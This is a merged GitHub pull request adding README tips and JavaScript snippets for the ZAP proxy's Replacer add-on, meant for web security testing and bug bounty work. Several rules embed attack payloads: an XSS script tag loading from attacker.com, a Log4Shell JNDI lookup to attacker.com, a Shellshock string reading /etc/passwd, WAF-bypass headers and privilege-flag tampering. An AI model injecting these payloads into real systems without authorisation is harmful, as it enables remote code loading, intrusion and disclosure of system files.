Skip to content

Update other/tips - part 2 #355

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Merged
merged 1 commit into from
Jun 28, 2023
Merged

Update other/tips - part 2 #355

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
3 changes: 3 additions & 0 deletions other/README.md
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,3 @@
# Other

This section exists to hold content that doesn't fall into one of the actual/normal script types.
20 changes: 20 additions & 0 deletions other/tips/README.md
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,20 @@
# Tips

This community Tips (and Tricks) section exists for people to share their ideas and usage tips for ZAP.

Please ensure your file is placed in an appropriate folder structure (ex: based on add-on name and topic).

More specifically the first content in this area, is structured as:

```dos
tips
│ README.md
└───replacer
└───match-and-replace
│ README.md
└───images
└───bypass-waf.png
emulate-ios.png
false-true-admin.png
...
```
3 changes: 3 additions & 0 deletions other/tips/replacer/README.md
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,3 @@
# Replacer

This section exists to hold content related to the [Replacer](https://www.zaproxy.org/docs/desktop/addons/replacer/) add-on.
238 changes: 237 additions & 1 deletion other/tips/replacer/match-and-replace/README.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -2,7 +2,9 @@

Useful Match and Replace ZAP rules.

Inspired by: https://github.com/daffainfo/match-replace-burp
Inspired by: <https://github.com/daffainfo/match-replace-burp>

**Note**: Where applicable each tip is accompanied by an expandable section, that contains a standalone JavaScript code snippet which adds the relevant Match-and-Replace rule in a disabled state. You'll need to go into Replacer's options to enable and use them. (Click the triangle/control to expand them.)

## Finding hidden buttons, forms, and other UI elements

Expand All @@ -22,14 +24,68 @@ In ZAP these can be Revealed with standard functionality: <https://www.zaproxy.o

![](images/show-hidden-1.png)

<details>
<summary>Show Hidden UI Elements</summary>

```js
// This script adds a Replacer rule
var extReplacer = control.getExtensionLoader().getExtension("ExtensionReplacer");

var replacerRule = Java.type("org.zaproxy.zap.extension.replacer.ReplacerParamRule");
// Match types: REQ_HEADER, REQ_HEADER_STR, REQ_BODY_STR, RESP_HEADER, RESP_HEADER_STR, RESP_BODY_STR
var matchType = Java.type("org.zaproxy.zap.extension.replacer.ReplacerParamRule.MatchType");

// https://github.com/zaproxy/zap-extensions/blob/e072df8ca4f7aff54d6e2dda98cfd8503810fa2c/addOns/replacer/src/main/java/org/zaproxy/zap/extension/replacer/ReplacerParamRule.java#L93-L107
var newRule = new replacerRule("Show hidden UI elements", "", matchType.RESP_BODY_STR, "hidden", false, "hizzen", null, false, false);
extReplacer.getParams().addRule(newRule);
```

</details>

- Show display:none UI

![](images/show-hidden-2.png)

<details>
<summary>Show display:none UI Elements</summary>

```js
// This script adds a Replacer rule
var extReplacer = control.getExtensionLoader().getExtension("ExtensionReplacer");

var replacerRule = Java.type("org.zaproxy.zap.extension.replacer.ReplacerParamRule");
// Match types: REQ_HEADER, REQ_HEADER_STR, REQ_BODY_STR, RESP_HEADER, RESP_HEADER_STR, RESP_BODY_STR
var matchType = Java.type("org.zaproxy.zap.extension.replacer.ReplacerParamRule.MatchType");

// https://github.com/zaproxy/zap-extensions/blob/e072df8ca4f7aff54d6e2dda98cfd8503810fa2c/addOns/replacer/src/main/java/org/zaproxy/zap/extension/replacer/ReplacerParamRule.java#L93-L107
var newRule = new replacerRule("Show display:hidden UI elements", "", matchType.RESP_BODY_STR, "display:none", false, "display:n0ne", null, false, false);
extReplacer.getParams().addRule(newRule);
```

</details>

- Change disable to enable

![](images/show-hidden-3.png)

<details>
<summary>Change disable to enable</summary>

```js
// This script adds a Replacer rule
var extReplacer = control.getExtensionLoader().getExtension("ExtensionReplacer");

var replacerRule = Java.type("org.zaproxy.zap.extension.replacer.ReplacerParamRule");
// Match types: REQ_HEADER, REQ_HEADER_STR, REQ_BODY_STR, RESP_HEADER, RESP_HEADER_STR, RESP_BODY_STR
var matchType = Java.type("org.zaproxy.zap.extension.replacer.ReplacerParamRule.MatchType");

// https://github.com/zaproxy/zap-extensions/blob/e072df8ca4f7aff54d6e2dda98cfd8503810fa2c/addOns/replacer/src/main/java/org/zaproxy/zap/extension/replacer/ReplacerParamRule.java#L93-L107
var newRule = new replacerRule("Change disable to enable", "", matchType.RESP_BODY_STR, "disable", false, "enable", null, false, false);
extReplacer.getParams().addRule(newRule);
```

</details>

## Changing false to true

Sometimes it is possible to un-hide or re-enable functionality or UI components by simply changing `false` to `true`.
Expand All @@ -39,10 +95,46 @@ Here are some example scenarios:

![](images/false-true-admin.png)

<details>
<summary>Change user role to admin</summary>

```js
// This script adds a Replacer rule
var extReplacer = control.getExtensionLoader().getExtension("ExtensionReplacer");

var replacerRule = Java.type("org.zaproxy.zap.extension.replacer.ReplacerParamRule");
// Match types: REQ_HEADER, REQ_HEADER_STR, REQ_BODY_STR, RESP_HEADER, RESP_HEADER_STR, RESP_BODY_STR
var matchType = Java.type("org.zaproxy.zap.extension.replacer.ReplacerParamRule.MatchType");

// https://github.com/zaproxy/zap-extensions/blob/e072df8ca4f7aff54d6e2dda98cfd8503810fa2c/addOns/replacer/src/main/java/org/zaproxy/zap/extension/replacer/ReplacerParamRule.java#L93-L107
var newRule = new replacerRule("Change user role to admin", "", matchType.RESP_BODY_STR, "admin: false", false, "admin: true", null, false, false);
extReplacer.getParams().addRule(newRule);
```

</details>

- Set email verified

![](images/false-true-email.png)

<details>
<summary>Set email verified</summary>

```js
// This script adds a Replacer rule
var extReplacer = control.getExtensionLoader().getExtension("ExtensionReplacer");

var replacerRule = Java.type("org.zaproxy.zap.extension.replacer.ReplacerParamRule");
// Match types: REQ_HEADER, REQ_HEADER_STR, REQ_BODY_STR, RESP_HEADER, RESP_HEADER_STR, RESP_BODY_STR
var matchType = Java.type("org.zaproxy.zap.extension.replacer.ReplacerParamRule.MatchType");

// https://github.com/zaproxy/zap-extensions/blob/e072df8ca4f7aff54d6e2dda98cfd8503810fa2c/addOns/replacer/src/main/java/org/zaproxy/zap/extension/replacer/ReplacerParamRule.java#L93-L107
var newRule = new replacerRule("Set email verified", "", matchType.RESP_BODY_STR, "email_verify: false", false, "email_verify: true", null, false, false);
extReplacer.getParams().addRule(newRule);
```

</details>

## Bypass WAF

Bypassing WAF by adding some request headers.
Expand All @@ -51,6 +143,24 @@ Bypassing WAF by adding some request headers.

![](images/bypass-waf.png)

<details>
<summary>Bypass WAF</summary>

```js
// This script adds a Replacer rule
var extReplacer = control.getExtensionLoader().getExtension("ExtensionReplacer");

var replacerRule = Java.type("org.zaproxy.zap.extension.replacer.ReplacerParamRule");
// Match types: REQ_HEADER, REQ_HEADER_STR, REQ_BODY_STR, RESP_HEADER, RESP_HEADER_STR, RESP_BODY_STR
var matchType = Java.type("org.zaproxy.zap.extension.replacer.ReplacerParamRule.MatchType");

// https://github.com/zaproxy/zap-extensions/blob/e072df8ca4f7aff54d6e2dda98cfd8503810fa2c/addOns/replacer/src/main/java/org/zaproxy/zap/extension/replacer/ReplacerParamRule.java#L93-L107
var newRule = new replacerRule("Bypass WAF", "", matchType.REQ_HEADER, "X-Forwarded-Host", false, "127.0.0.1", null, false, false);
extReplacer.getParams().addRule(newRule);
```

</details>

Other request headers/values which may assist in bypassing WAFs include (but are not limited to):

```text
Expand Down Expand Up @@ -81,25 +191,97 @@ For example changing a known UUID to another value:

![](images/finding-idor.png)

<details>
<summary>Finding IDOR</summary>

```js
// This script adds a Replacer rule
var extReplacer = control.getExtensionLoader().getExtension("ExtensionReplacer");

var replacerRule = Java.type("org.zaproxy.zap.extension.replacer.ReplacerParamRule");
// Match types: REQ_HEADER, REQ_HEADER_STR, REQ_BODY_STR, RESP_HEADER, RESP_HEADER_STR, RESP_BODY_STR
var matchType = Java.type("org.zaproxy.zap.extension.replacer.ReplacerParamRule.MatchType");

// https://github.com/zaproxy/zap-extensions/blob/e072df8ca4f7aff54d6e2dda98cfd8503810fa2c/addOns/replacer/src/main/java/org/zaproxy/zap/extension/replacer/ReplacerParamRule.java#L93-L107
var newRule = new replacerRule("Finding IDOR", "", matchType.REQ_BODY_STR, "9364e9f8-7080-4852-b2ff-d21e2acee6", false, "d58f540d-bd7b-4b5c-ba2a-f82bbc1241d8", null, false, false);
extReplacer.getParams().addRule(newRule);
```

</details>

## Finding XSS

- Finding XSS on `Referer`

![](images/finding-xss-referer.png)

<details>
<summary>Finding XSS in Referer</summary>

```js
// This script adds a Replacer rule
var extReplacer = control.getExtensionLoader().getExtension("ExtensionReplacer");

var replacerRule = Java.type("org.zaproxy.zap.extension.replacer.ReplacerParamRule");
// Match types: REQ_HEADER, REQ_HEADER_STR, REQ_BODY_STR, RESP_HEADER, RESP_HEADER_STR, RESP_BODY_STR
var matchType = Java.type("org.zaproxy.zap.extension.replacer.ReplacerParamRule.MatchType");

// https://github.com/zaproxy/zap-extensions/blob/e072df8ca4f7aff54d6e2dda98cfd8503810fa2c/addOns/replacer/src/main/java/org/zaproxy/zap/extension/replacer/ReplacerParamRule.java#L93-L107
var newRule = new replacerRule("Finding XSS in Referer", "", matchType.REQ_HEADER, "Referer", false, "\"><script src=https://attacker.com></script>", null, false, false);
extReplacer.getParams().addRule(newRule);
```

</details>

- Automatically replace user input with an XSS payload

![](images/finding-xss-user.png)

So by just inputting the string `xss_payload` on the website it will be immediately replaced with `"><script src=https://attacker.com></script>`.
Change the XSS payload as you see fit.

<details>
<summary>Easily replace XSS payload</summary>

```js
// This script adds a Replacer rule
var extReplacer = control.getExtensionLoader().getExtension("ExtensionReplacer");

var replacerRule = Java.type("org.zaproxy.zap.extension.replacer.ReplacerParamRule");
// Match types: REQ_HEADER, REQ_HEADER_STR, REQ_BODY_STR, RESP_HEADER, RESP_HEADER_STR, RESP_BODY_STR
var matchType = Java.type("org.zaproxy.zap.extension.replacer.ReplacerParamRule.MatchType");

// https://github.com/zaproxy/zap-extensions/blob/e072df8ca4f7aff54d6e2dda98cfd8503810fa2c/addOns/replacer/src/main/java/org/zaproxy/zap/extension/replacer/ReplacerParamRule.java#L93-L107
var newRule = new replacerRule("Easily replace XSS payload", "", matchType.REQ_BODY_STR, "xss_payload", false, "\"><script src=https://attacker.com></script>", null, false, false);
extReplacer.getParams().addRule(newRule);
```

</details>

## Misc

- Help companies to identify your traffic and separate it from malicious traffic by adding a custom header

![](images/hackerone-header.png)

<details>
<summary>Add hackerone header</summary>

```js
// This script adds a Replacer rule
var extReplacer = control.getExtensionLoader().getExtension("ExtensionReplacer");

var replacerRule = Java.type("org.zaproxy.zap.extension.replacer.ReplacerParamRule");
// Match types: REQ_HEADER, REQ_HEADER_STR, REQ_BODY_STR, RESP_HEADER, RESP_HEADER_STR, RESP_BODY_STR
var matchType = Java.type("org.zaproxy.zap.extension.replacer.ReplacerParamRule.MatchType");

// https://github.com/zaproxy/zap-extensions/blob/e072df8ca4f7aff54d6e2dda98cfd8503810fa2c/addOns/replacer/src/main/java/org/zaproxy/zap/extension/replacer/ReplacerParamRule.java#L93-L107
var newRule = new replacerRule("Add hackerone header", "", matchType.REQ_HEADER, "X-Header-Hackerone", false, "YourHackeroneUserName", null, false, false);
extReplacer.getParams().addRule(newRule);
```

</details>

- Setting the `User-Agent` (UA) or emulating a mobile browser.

In ZAP the User-Agent request header is controlled via Connection options. However, if you wanted to emulate a mobile browser in order to see the mobile UI of a target or perhaps discover some different functionality or behavior. You could change it to a Mobile UA: https://www.zaproxy.org/docs/desktop/addons/network/options/connection/#default-user-agent
Expand All @@ -112,10 +294,64 @@ This could also be done with a Replacer rule.

![](images/emulate-ios.png)

<details>
<summary>Emulate iOS</summary>

```js
// This script adds a Replacer rule
var extReplacer = control.getExtensionLoader().getExtension("ExtensionReplacer");

var replacerRule = Java.type("org.zaproxy.zap.extension.replacer.ReplacerParamRule");
// Match types: REQ_HEADER, REQ_HEADER_STR, REQ_BODY_STR, RESP_HEADER, RESP_HEADER_STR, RESP_BODY_STR
var matchType = Java.type("org.zaproxy.zap.extension.replacer.ReplacerParamRule.MatchType");

// https://github.com/zaproxy/zap-extensions/blob/e072df8ca4f7aff54d6e2dda98cfd8503810fa2c/addOns/replacer/src/main/java/org/zaproxy/zap/extension/replacer/ReplacerParamRule.java#L93-L107
var newRule = new replacerRule("Emulate iOS", "", matchType.REQ_HEADER, "User-Agent", false, "Mozilla/5.0 (iPhone; CPU iPhone OS 16_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Mobile/15E148 Safari/604.1", null, false, false);
extReplacer.getParams().addRule(newRule);
```

</details>

- Finding [CVE-2021-44228](https://github.com/advisories/GHSA-jfh8-c2jp-5v3q)

![](images/log4shell.png)

<details>
<summary>Find CVE-2021-44228</summary>

```js
// This script adds a Replacer rule
var extReplacer = control.getExtensionLoader().getExtension("ExtensionReplacer");

var replacerRule = Java.type("org.zaproxy.zap.extension.replacer.ReplacerParamRule");
// Match types: REQ_HEADER, REQ_HEADER_STR, REQ_BODY_STR, RESP_HEADER, RESP_HEADER_STR, RESP_BODY_STR
var matchType = Java.type("org.zaproxy.zap.extension.replacer.ReplacerParamRule.MatchType");

// https://github.com/zaproxy/zap-extensions/blob/e072df8ca4f7aff54d6e2dda98cfd8503810fa2c/addOns/replacer/src/main/java/org/zaproxy/zap/extension/replacer/ReplacerParamRule.java#L93-L107
var newRule = new replacerRule("Replace User-Agent with Log4j Attack", "", matchType.REQ_HEADER, "User-Agent", false, "${jndi:ldap://attacker.com/x}", null, false, false);
extReplacer.getParams().addRule(newRule);
```

</details>

- Replace User-Agent with shellshock attack [CVE-2014-6271](https://github.com/advisories/GHSA-6hfc-grwp-2p9c)

![](images/shellshock.png)

<details>
<summary>Find CVE-2014-6271</summary>

```js
// This script adds a Replacer rule
var extReplacer = control.getExtensionLoader().getExtension("ExtensionReplacer");

var replacerRule = Java.type("org.zaproxy.zap.extension.replacer.ReplacerParamRule");
// Match types: REQ_HEADER, REQ_HEADER_STR, REQ_BODY_STR, RESP_HEADER, RESP_HEADER_STR, RESP_BODY_STR
var matchType = Java.type("org.zaproxy.zap.extension.replacer.ReplacerParamRule.MatchType");

// https://github.com/zaproxy/zap-extensions/blob/e072df8ca4f7aff54d6e2dda98cfd8503810fa2c/addOns/replacer/src/main/java/org/zaproxy/zap/extension/replacer/ReplacerParamRule.java#L93-L107
var newRule = new replacerRule("Replace User-Agent with shellshock attack", "", matchType.REQ_HEADER, "User-Agent", false, "(){:;};/bin/cat /etc/passwd", null, false, false);
extReplacer.getParams().addRule(newRule);
```

</details>